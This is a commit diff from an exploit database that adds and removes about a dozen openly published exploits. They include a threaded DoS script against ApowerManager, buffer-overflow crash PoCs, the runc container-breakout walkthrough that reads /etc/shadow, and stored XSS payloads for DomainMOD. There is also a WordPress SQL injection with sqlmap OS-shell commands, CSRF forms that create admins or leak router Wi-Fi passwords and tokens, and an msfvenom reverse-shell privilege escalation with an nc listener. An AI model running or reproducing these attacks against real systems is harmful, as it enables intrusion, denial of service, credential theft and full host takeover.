DB: 2019-02-15
18 changes to exploits/shellcodes Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC) MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1) exacqVision ESM 5.12.2 - Privilege Escalation runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure) DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
parent
a4b18dada5
commit
5f3f5c8f09
16 changed files with 441 additions and 168 deletions
49
exploits/android/dos/46380.py
Executable file
49
exploits/android/dos/46380.py
Executable file
|
@ -0,0 +1,49 @@
|
|||
#!/usr/bin/python
|
||||
#coding: utf-8
|
||||
|
||||
# *********************************************************************
|
||||
# * Author: Marcelo Vázquez (aka s4vitar) *
|
||||
# * ApowerManager Remote Denial of Service (DoS) / Application Crash *
|
||||
# *********************************************************************
|
||||
|
||||
# Exploit Title: ApowerManager - Phone Manager Remote Denial of Service (DoS) / Application Crash
|
||||
# Date: 2019-02-14
|
||||
# Exploit Author: Marcelo Vázquez (aka s4vitar)
|
||||
# Vendor Homepage: https://www.apowersoft.com/phone-manager
|
||||
# Software Link: https://www.apkmonk.com/download-app/com.apowersoft.phone.manager/4_com.apowersoft.phone.manager_2019-01-08.apk/
|
||||
# Version: <= ApowerManager - Phone Manager 3.1.7
|
||||
# Tested on: Android
|
||||
|
||||
import sys, requests, threading, signal
|
||||
|
||||
def handler(signum, frame):
|
||||
print '\nFinishing program...\n'
|
||||
sys.exit(0)
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
print "\nUsage: python " + sys.argv[0] + " <ip_address> <port>\n"
|
||||
print "Example: python apowermanager_dos.py 192.168.1.125 2333\n"
|
||||
sys.exit(0)
|
||||
|
||||
def startAttack(url):
|
||||
url_destination = url + '/?Key=PhoneRequestAuthorization'
|
||||
headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'}
|
||||
|
||||
r = requests.post(url_destination, headers=headers)
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
signal.signal(signal.SIGINT, handler)
|
||||
url = 'http://' + sys.argv[1] + ':' + sys.argv[2]
|
||||
|
||||
threads = []
|
||||
|
||||
for i in xrange(0, 10000):
|
||||
t = threading.Thread(target=startAttack, args=(url,))
|
||||
threads.append(t)
|
||||
|
||||
for x in threads:
|
||||
x.start()
|
||||
|
||||
for x in threads:
|
||||
x.join()
|
|
@ -1,33 +0,0 @@
|
|||
# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
|
||||
# Date: 12.02.2019
|
||||
# Exploit Author: Ronnie T Baby
|
||||
# Contact:https://www.linkedin.com/in/ronnietbaby
|
||||
# Vendor Homepage: www.jio.com
|
||||
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
|
||||
# Category: Hardware (Wifi Router)
|
||||
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE: CVE-2019-7687
|
||||
|
||||
|
||||
Description:
|
||||
cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.
|
||||
|
||||
1. Create a poc.html and insert
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
|
||||
<input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert(document.domain)</script>pyk0j" />
|
||||
<input type="hidden" name="mask" value="0" />
|
||||
<input type="hidden" name="token" value="0" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>d
|
||||
</html>
|
||||
|
||||
2. Send to victim(who is connected to the wifi network).
|
||||
3. Post based Xss gets fired .
|
||||
|
||||
Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.
|
|
@ -1,41 +0,0 @@
|
|||
# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password
|
||||
# Date: 12.02.2019
|
||||
# Exploit Author: Ronnie T Baby
|
||||
# Contact:https://www.linkedin.com/in/ronnietbaby
|
||||
# Vendor Homepage: www.jio.com
|
||||
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
|
||||
# Category: Hardware (Wifi Router)
|
||||
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE: CVE-2019-7745
|
||||
|
||||
Description:
|
||||
|
||||
JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field.
|
||||
|
||||
POC-
|
||||
1. Create a view.html and insert
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
|
||||
<input type="hidden" name="Page" value="GetWiFi_Setting" />
|
||||
<input type="hidden" name="Mask" value="0" />
|
||||
<input type="hidden" name="result" value="0" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
2. Send to victim(who is connected to the wifi network).
|
||||
3. The response gives the current wifi password.
|
||||
Example response-
|
||||
|
||||
{"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID",
|
||||
"wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES",
|
||||
"wpa_security_key":"leakedpassword",".....etc}
|
||||
|
||||
|
||||
Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.
|
|
@ -1,90 +0,0 @@
|
|||
# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router
|
||||
# Date: 12.02.2019
|
||||
# Exploit Author: Ronnie T Baby
|
||||
# Contact:https://www.linkedin.com/in/ronnietbaby
|
||||
# Vendor Homepage: www.jio.com
|
||||
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
|
||||
# Category: Hardware (Wifi Router)
|
||||
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE: CVE-2019-7746
|
||||
|
||||
Description:
|
||||
|
||||
JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset.
|
||||
|
||||
POC-
|
||||
|
||||
The exploit requires two csrf requests to be sent to the victim(logged to the web interface) connected to the Jiofi router.
|
||||
|
||||
1. First get admin tokens
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
|
||||
<input type="hidden" name="type" value="getuser" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Example response-
|
||||
|
||||
{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}
|
||||
|
||||
Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router.
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
|
||||
<input type="hidden" name="Page" value="SetWiFi_Setting" />
|
||||
<input type="hidden" name="Mask" value="0" />
|
||||
<input type="hidden" name="result" value="0" />
|
||||
<input type="hidden" name="ssid" value="JioFi4_08FE5F" />
|
||||
<input type="hidden" name="mode_802_11" value="11bgn" />
|
||||
<input type="hidden" name="tx_power" value="HIGH" />
|
||||
<input type="hidden" name="wmm" value="Enable" />
|
||||
<input type="hidden" name="wps_enable" value="PushButton" />
|
||||
<input type="hidden" name="wifi_security" value="WPA2PSK" />
|
||||
<input type="hidden" name="wpa_encryption_type" value="AES" />
|
||||
<input type="hidden" name="wpa_security_key" value="Iamhacked" />
|
||||
<input type="hidden" name="wep_security_key_1" value="0" />
|
||||
<input type="hidden" name="wep_security_key_2" value="0" />
|
||||
<input type="hidden" name="wep_security_key_3" value="0" />
|
||||
<input type="hidden" name="wep_security_key_4" value="0" />
|
||||
<input type="hidden" name="wep_current_default_key" value="0" />
|
||||
<input type="hidden" name="channel_mode" value="automatic" />
|
||||
<input type="hidden" name="channel_selection" value="11" />
|
||||
<input type="hidden" name="sleep_mode" value="Enable" />
|
||||
<input type="hidden" name="sleep_mode_timer" value="30" />
|
||||
<input type="hidden" name="ssid_broadcast" value="Enable" />
|
||||
<input type="hidden" name="enable_wifi" value="Enable" />
|
||||
<input type="hidden" name="token" value="leakedtokens" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Wifi Password changed to Iamhacked
|
||||
|
||||
Choice B) Perform Remote Factory Reset
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
|
||||
<input type="hidden" name="type" value="FRST_REAL" />
|
||||
<input type="hidden" name="token" value="leakedtokens" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
The router reboots to default settings.
|
||||
|
||||
|
||||
Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.
|
81
exploits/linux/local/46369.md
Normal file
81
exploits/linux/local/46369.md
Normal file
|
@ -0,0 +1,81 @@
|
|||
## CVE-2019-5736 ##
|
||||
|
||||
This is exploit code for CVE-2019-5736 (and it works for both runc and LXC).
|
||||
The simplest way to use it is to copy the exploit code into an existing
|
||||
container, and run `make.sh`. However, you could just as easily create a bad
|
||||
image and run that.
|
||||
|
||||
```console
|
||||
% docker run --rm --name pwnme -dit ubuntu:18.10 bash
|
||||
pwnme
|
||||
% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar
|
||||
```
|
||||
|
||||
We need to install `gcc` to build the exploit, and `runc` because we need to
|
||||
have the shared libraries that `runc` would use. We don't actually use the
|
||||
`runc` binary itself. For LXC, you would install `lxc` instead of `runc`.
|
||||
|
||||
```console
|
||||
% docker attach pwnme
|
||||
# apt-get update && apt-get install -y gcc runc
|
||||
[ snip ]
|
||||
# tar xf CVE-2019-5736.tar
|
||||
# ./CVE-2019-5736/make.sh
|
||||
```
|
||||
|
||||
And now, `/bin/bash` in the container will be able to **overwrite the host runc
|
||||
binary**. Since this binary is often executed by `root`, this allows for
|
||||
root-level code execution on the host.
|
||||
|
||||
```
|
||||
% docker exec -it pwnme /bin/bash
|
||||
[+] bad_libseccomp.so booted.
|
||||
[+] opened ro /proc/self/exe <3>.
|
||||
[+] constructed fdpath </proc/self/fd/3>
|
||||
[+] bad_init is ready -- see </tmp/bad_init_log> for logs.
|
||||
[*] dying to allow /proc/self/exe to be unused...
|
||||
% cat /usr/sbin/docker-runc
|
||||
#!/bin/bash
|
||||
touch /w00t_w00t ; cat /etc/shadow
|
||||
```
|
||||
|
||||
And now if you try to use Docker normally, the malicious script will execute
|
||||
with root privileges:
|
||||
|
||||
```
|
||||
% docker exec -it pwnme /bin/good_bash
|
||||
OCI runtime state failed: invalid character 'b' looking for beginning of value: unknown
|
||||
% file /w00t_w00t
|
||||
/w00t_w00t: empty
|
||||
```
|
||||
|
||||
And obviously `make.sh` can be modified to make the evil path anything you
|
||||
like. If you want to get access to the container, use `/bin/good_bash`.
|
||||
|
||||
### License ###
|
||||
|
||||
```
|
||||
Copyright (C) 2019 Aleksa Sarai <cyphar@cyphar.com>
|
||||
Vulnerability discovered by Adam Iwaniuk and Borys Popławski.
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to
|
||||
deal in the Software without restriction, including without limitation the
|
||||
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
|
||||
sell copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
* The above copyright notice and this permission notice shall be included in
|
||||
all copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
|
||||
IN THE SOFTWARE.
|
||||
```
|
||||
|
||||
|
||||
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip
|
16
exploits/php/webapps/46372.txt
Normal file
16
exploits/php/webapps/46372.txt
Normal file
|
@ -0,0 +1,16 @@
|
|||
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
|
||||
# Date: 2018-11-22
|
||||
# Exploit Author: Mohammed Abdul Raheem
|
||||
# Vendor Homepage: domainmod (https://domainmod.org/)
|
||||
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
|
||||
# Version: v4.09.03 to v4.11.01
|
||||
# CVE : CVE-2018-20009
|
||||
|
||||
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
|
||||
# versions from v4.09.03 to v4.11.01
|
||||
# After logging into the Domainmod application panel, browse to the
|
||||
/assets/add/ssl-provider.php page and inject a javascript XSS payload
|
||||
in ssl-provider-name, ssl-provider's-url "><img src=x
|
||||
onerror=alert("Xss-By-Abdul-Raheem")>
|
||||
|
||||
#POC : attached here https://github.com/domainmod/domainmod/issues/88
|
16
exploits/php/webapps/46373.txt
Normal file
16
exploits/php/webapps/46373.txt
Normal file
|
@ -0,0 +1,16 @@
|
|||
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
|
||||
# Date: 2018-11-22
|
||||
# Exploit Author: Mohammed Abdul Raheem
|
||||
# Vendor Homepage: domainmod (https://domainmod.org/)
|
||||
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
|
||||
# Version: v4.09.03 to v4.11.01
|
||||
# CVE : CVE-2018-20010
|
||||
|
||||
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
|
||||
# versions from v4.09.03 to v4.11.01
|
||||
# After logging into the Domainmod application panel, browse to the
|
||||
/assets/add/ssl-provider-account.php page and inject a javascript XSS
|
||||
payload in username field "><img src=x
|
||||
onerror=alert("Xss-By-Abdul-Raheem")>
|
||||
|
||||
#POC : attached here https://github.com/domainmod/domainmod/issues/88
|
16
exploits/php/webapps/46374.txt
Normal file
16
exploits/php/webapps/46374.txt
Normal file
|
@ -0,0 +1,16 @@
|
|||
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
|
||||
# Date: 2018-11-22
|
||||
# Exploit Author: Mohammed Abdul Raheem
|
||||
# Vendor Homepage: domainmod (https://domainmod.org/)
|
||||
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
|
||||
# Version: v4.09.03 to v4.11.01
|
||||
# CVE : CVE-2018-20011
|
||||
|
||||
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
|
||||
# versions from v4.09.03 to v4.11.01
|
||||
# After logging into the Domainmod application panel, browse to the
|
||||
/assets/add/category.php page and inject a javascript XSS payload in
|
||||
CatagoryName, StakeHolder fields "><img src=x
|
||||
onerror=alert("Xss-By-Abdul-Raheem")>
|
||||
|
||||
#POC : attached here https://github.com/domainmod/domainmod/issues/88
|
14
exploits/php/webapps/46375.txt
Normal file
14
exploits/php/webapps/46375.txt
Normal file
|
@ -0,0 +1,14 @@
|
|||
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
|
||||
# Date: 2018-11-22
|
||||
# Exploit Author: Mohammed Abdul Raheem
|
||||
# Vendor Homepage: domainmod (https://domainmod.org/)
|
||||
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
|
||||
# Version: v4.09.03 to v4.11.01
|
||||
# CVE : CVE-2018-19914
|
||||
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
|
||||
# versions from v4.09.03 to v4.11.01
|
||||
# After logging into the Domainmod application panel, browse to the
|
||||
/assets/add/dns.php page and inject a javascript XSS payload in
|
||||
Profile Name & notes fields "><img src=x onerror=alert("XSSed-By-Abdul-Kareem")>
|
||||
|
||||
#POC : attached here https://github.com/domainmod/domainmod/issues/87
|
15
exploits/php/webapps/46376.txt
Normal file
15
exploits/php/webapps/46376.txt
Normal file
|
@ -0,0 +1,15 @@
|
|||
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
|
||||
# Date: 2018-11-22
|
||||
# Exploit Author: Mohammed Abdul Kareem
|
||||
# Vendor Homepage: domainmod (https://domainmod.org/)
|
||||
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
|
||||
# Version: v4.09.03 to v4.11.01
|
||||
# CVE : CVE-2018-19915
|
||||
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
|
||||
# versions from v4.09.03 to v4.11.01
|
||||
# After logging into the Domainmod application panel, browse to the
|
||||
/assets/edit/host.php?whid=5 page and inject a javascript XSS payload
|
||||
in "Web Host Name" & "Web Host's url fields "><img src=x
|
||||
onerror=alert("XSSed-By-Abdul-Kareem")>
|
||||
|
||||
#POC : attached here https://github.com/domainmod/domainmod/issues/87
|
58
exploits/php/webapps/46377.txt
Normal file
58
exploits/php/webapps/46377.txt
Normal file
|
@ -0,0 +1,58 @@
|
|||
# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability
|
||||
# Date: 2018-12-28
|
||||
# Exploit Author: B0UG
|
||||
# Vendor Homepage: https://wpbookingcalendar.com/
|
||||
# Software Link: https://wordpress.org/plugins/booking/
|
||||
# Version: Tested on version 8.4.3 (older versions may also be affected)
|
||||
# Tested on: WordPress
|
||||
# Category : Webapps
|
||||
# CVE: CVE-2018-20556
|
||||
|
||||
#I. VULNERABILITY
|
||||
|
||||
Authenticated SQL Injection
|
||||
|
||||
#II. BACKGROUND
|
||||
'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.
|
||||
|
||||
#III. DESCRIPTION
|
||||
An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database.
|
||||
|
||||
#IV. PROOF OF CONCEPT
|
||||
1) Access WordPress control panel.
|
||||
2) Navigate to the Booking Calendar plugin page.
|
||||
3) Set up Burp Suite to capture the traffic.
|
||||
4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.
|
||||
5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.
|
||||
6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection:
|
||||
• Boolean based blind injection
|
||||
• Error based injection
|
||||
• Time based injection
|
||||
|
||||
7) We can perform a time based SQL injection by appending ) AND SLEEP(100) AND (1=1 after the ID value in the parameter as shown below.
|
||||
action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67
|
||||
|
||||
Obtaining a shell using sqlmap
|
||||
-----------------------
|
||||
• Obtain a SQL Shell
|
||||
Sqlmap –r post-request.txt –p booking_id --sql-shell
|
||||
|
||||
• Obtain a Linux Shell
|
||||
Sqlmap –r post-request.txt –p booking_id --os-shell
|
||||
|
||||
• Obtain a Windows Command Prompt
|
||||
Sqlmap –r post-request.txt –p booking_id --os-cmd
|
||||
|
||||
#V. IMPACT
|
||||
The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.
|
||||
|
||||
#VI. SYSTEMS AFFECTED
|
||||
WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).
|
||||
|
||||
#VII. REMEDIATION
|
||||
Uninstall the plugin until the vulnerability has been fixed by the developer.
|
||||
|
||||
#VIII. DISCLOSURE TIMELINE
|
||||
#December 28, 2018 1: Vulnerability identified.
|
||||
#December 28, 2018 2: Informed developer of the vulnerability.
|
||||
#February 14, 2019 3: No communication received back from the developer.
|
38
exploits/php/webapps/46379.txt
Normal file
38
exploits/php/webapps/46379.txt
Normal file
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title: LayerBB 1.1.2 - Cross-Site Request Forgery
|
||||
# Date: 10/4/2018
|
||||
# Author: 0xB9
|
||||
# Twitter: @0xB9Sec
|
||||
# Contact: 0xB9[at]pm.me
|
||||
# Software Link: https://forum.layerbb.com
|
||||
# Version: 1.1.2
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE: CVE-2018-17996
|
||||
|
||||
|
||||
1. Description:
|
||||
LayerBB is a free open-source forum software, the CSRF allows creating a admin user.
|
||||
|
||||
|
||||
2. Proof of Concept:
|
||||
|
||||
<!-- Create Admin User -->
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/[path]/admin/new_user.php" method="POST">
|
||||
<label for="username">Username</label>
|
||||
<input name="username" id="username" value="test" type="text">
|
||||
<label for="password">Password</label>
|
||||
<input name="password" id="password" value="password123" type="password">
|
||||
<label for="email">Email Address</label>
|
||||
<input name="email" id="email" value="test@localhost.co" type="text">
|
||||
<label for="usergroup">Usergroup</label><br>
|
||||
<select name="usergroup" id="usergroup" style="width:100%;"><option value="4">Administrator</option></select><br><br>
|
||||
<input name="create" value="Create User" type="submit">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
<!-- Create Admin User End -->
|
||||
|
||||
|
||||
3. Solution:
|
||||
Update to 1.1.3
|
26
exploits/windows/dos/46371.py
Executable file
26
exploits/windows/dos/46371.py
Executable file
|
@ -0,0 +1,26 @@
|
|||
#Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC)
|
||||
#Discovery by: Victor Mondragón
|
||||
#Discovery Date: 2019-02-13
|
||||
#Vendor Homepage: http://www.coreftp.com/
|
||||
#Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe
|
||||
#Tested Version: v2-Build 673
|
||||
#Tested on: Windows 7 Service Pack 1 x32
|
||||
|
||||
#Steps to produce the crash:
|
||||
#1.- Run python code: Core_FTP_SFTP_Server_1.2.py
|
||||
#2.- Open core_code.txt and copy content to clipboard
|
||||
#3.- Open Core FTP Server
|
||||
#4.- Select "Setup" > "New"
|
||||
#5.- Select "Domain Name" and Put "Test"
|
||||
#6.- Select "Domain IP/Address" and Put "1.1.1.1"
|
||||
#7.- Select "Base directory" and Choose a directory path
|
||||
#8.- Enable "WinNT users"
|
||||
#9.- Select "User domain" and Paste Clipboard
|
||||
#10.- Click on "Ok" and the next window click "Ok"
|
||||
#11.- Crashed
|
||||
|
||||
cod = "\x41" * 7000
|
||||
|
||||
f = open('core_code.txt', 'w')
|
||||
f.write(cod)
|
||||
f.close()
|
24
exploits/windows/dos/46378.py
Executable file
24
exploits/windows/dos/46378.py
Executable file
|
@ -0,0 +1,24 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
# Exploit Title: MediaMonkey 4.1.23 - URL Denial of Service (PoC)
|
||||
# Date: 13/02/2019
|
||||
# Author: Alejandra Sánchez
|
||||
# Vendor Homepage: https://www.mediamonkey.com/
|
||||
# Software Link: https://www.mediamonkey.com/sw/MediaMonkey_4.1.23.1881.exe
|
||||
# Version: 4.1.23.1881
|
||||
# Tested on: Windows 10
|
||||
|
||||
# Proof of Concept:
|
||||
# 1.- Run the python script "MediaMonkey.py", it will create a new file "PoC.mp3"
|
||||
# 2.- Open MediaMonkey.exe
|
||||
# 3.- Go to File > Open URL or File...
|
||||
# 4.- Click on button -> Browse... and select the 'PoC.mp3' file created
|
||||
# 5.- Crashed
|
||||
|
||||
buffer = "http://127.0.0.1/"
|
||||
badstr = "\x41" * 4000
|
||||
buffer += badstr
|
||||
buffer += ".mp3"
|
||||
|
||||
f = open ("PoC.mp3", "w")
|
||||
f.write(buffer)
|
||||
f.close()
|
75
exploits/windows/local/46370.txt
Normal file
75
exploits/windows/local/46370.txt
Normal file
|
@ -0,0 +1,75 @@
|
|||
# Exploit Title: exacqVision ESM 5.12.2 - Privilege Escalation
|
||||
# Exploit Author: bzyo
|
||||
# Twitter: @bzyo_
|
||||
# Date: 2019-02-13
|
||||
# Vulnerable Software:
|
||||
# http://cdnpublic.exacq.com/5.12/exacqVisionEnterpriseSystemManager_5.12.2.150128_x86.exe
|
||||
# Vendor Homepage: https://www.exacq.com
|
||||
# Version: 5.12.2.150128
|
||||
# Tested Windows 7 SP1 x86 and Windows 10 x64
|
||||
|
||||
# Description:
|
||||
# exacqVision ESM 5.12.2 suffers from Privilege Escalation due to insecure file permissions
|
||||
|
||||
# Prerequisites
|
||||
# Local, Low privilege access with restart capabilities
|
||||
|
||||
# Details
|
||||
# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
|
||||
# A low privilege account is able to rename the enterprisesystemmanager.exe file located in
|
||||
# this same path and replace with a malicious file that would connect back to an attacking computer giving system level privileges
|
||||
# (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service
|
||||
# through the application, a restart of the computer triggers the execution of the malicious file.
|
||||
|
||||
# note: during install, you cannot choose a folder containing spaces i.e. "program files"
|
||||
|
||||
C:\>icacls exacqVisionEsm
|
||||
exacqVisionEsm NT AUTHORITY\NETWORK SERVICE:(RX)
|
||||
win7-32bit\bob:(RX)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Users:(I)(OI)(CI)(RX)
|
||||
NT AUTHORITY\Authenticated Users:(I)(M)
|
||||
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
|
||||
|
||||
Successfully processed 1 files; Failed processing 0 files
|
||||
|
||||
|
||||
C:\>sc qc "exacqVision Enterprise System Manager Web Service"
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: exacqVision Enterprise System Manager Web Service
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe"
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : ESMWebService
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
# Proof of Concept
|
||||
1. Generate malicious .exe on attacking machine
|
||||
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.163 LPORT=443 -f exe > /var/www/html/enterprisesystemmanager.exe
|
||||
|
||||
2. Setup listener and ensure apache is running on attacking machine
|
||||
nc -nlvvp 443
|
||||
service apache2 start
|
||||
|
||||
3. Download malicious .exe on victim machine
|
||||
Open browser to http://192.168.0.163/enterprisesystemmanager.exe and download
|
||||
|
||||
4. Rename C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe
|
||||
enterprisesystemmanager.exe > enterprisesystemmanager.bak
|
||||
|
||||
5. Copy/Move downloaded enterprisesystemmanager.exe file to C:\exacqVisionEsm\EnterpriseSystemManager\
|
||||
|
||||
6. Restart victim machine and login as low privileged user
|
||||
|
||||
7. Reverse Shell on attacking machine opens
|
||||
C:\Windows\system32>whoami
|
||||
whoami
|
||||
nt authority\system
|
|
@ -6307,6 +6307,9 @@ id,file,description,date,author,type,platform,port
|
|||
